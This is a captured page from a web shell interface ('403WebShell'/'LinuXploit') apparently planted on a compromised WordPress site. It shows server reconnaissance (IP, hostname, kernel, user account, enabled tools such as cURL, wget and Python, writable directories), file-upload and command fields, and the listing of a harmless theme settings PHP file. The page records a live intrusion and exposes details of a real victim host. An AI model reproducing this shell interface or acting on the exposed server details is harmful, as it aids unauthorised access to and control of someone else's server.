Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.35.234
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/header_setting.php
<?php
return array(
    'title'      => esc_html__('Header 1 Setting', 'meto'),
    'id'         => 'header_setting',
    'desc'       => '',
    'subsection' => true,
    'fields'     => array(
        array(
            'id'      => 'logo_type',
            'type'    => 'button_set',
            'title'   => esc_html__('Logo Style', 'meto'),
            'desc'    => esc_html__('Select anyone logo style to show in header', 'meto'),
            'options' => array(
                'image' => esc_html__('Image Logo', 'meto'),
                'text'  => esc_html__('Text Logo', 'meto'),
            ),
            'default' => 'image',
        ),
        array(
            'id'       => 'image_logo',
            'type'     => 'media',
            'url'      => true,
            'title'    => esc_html__('Logo', 'meto'),
            'subtitle' => esc_html__('Insert site logo image with adjustable size for the logo section', 'meto'),
            'default'  => array( 'url' => get_template_directory_uri() . '/assets/images/logo-2.png' ),
            'required' => array( array( 'logo_type', 'equals', 'image' ) ),
        ),
        array(
            'id'       => 'logo_dimension',
            'type'     => 'dimensions',
            'title'    => esc_html__('Logo Dimentions', 'meto'),
            'subtitle' => esc_html__('Select Logo Dimentions', 'meto'),
            'units'    => array( 'em', 'px', '%' ),
            'default'  => array( 'Width' => '', 'Height' => '' ),
            'required' => array(
                array( 'logo_type', 'equals', 'image' ),
            ),
        ),
        array(
            'id'       => 'logo_text',
            'type'     => 'text',
            'title'    => esc_html__('Logo Text', 'meto'),
            'subtitle' => esc_html__('Enter Logo Text', 'meto'),
            'required' => array(
                array( 'logo_type', 'equals', 'text' ),
            ),
        ),
        array(
            'id'          => 'logo_typography',
            'type'        => 'typography',
            'title'       => esc_html__('Typography', 'meto'),
            'google'      => true,
            'font-backup' => false,
            'text-align'  => false,
            'line-height' => false,
            'output'      => array( 'h2.site-description' ),
            'units'       => 'px',
            'subtitle'    => esc_html__('Select Styles for text logo', 'meto'),
            'default'     => array(
                'color'       => '#333',
                'font-style'  => '700',
                'font-family' => 'Abel',
                'google'      => true,
                'font-size'   => '33px',
            ),
            'required'    => array(
                array( 'logo_type', 'equals', 'text' ),
            ),
        ),

        array(
            'id'    => 'header_social_share',
            'type'  => 'social_media',
            'title' => esc_html__('Social Profiles', 'meto'),
            'desc'  => esc_html__('Click an icon to activate social profile icons in header.', 'meto'),
        ),
    ),
);

Youez - 2016 - github.com/yon3zu
LinuXploit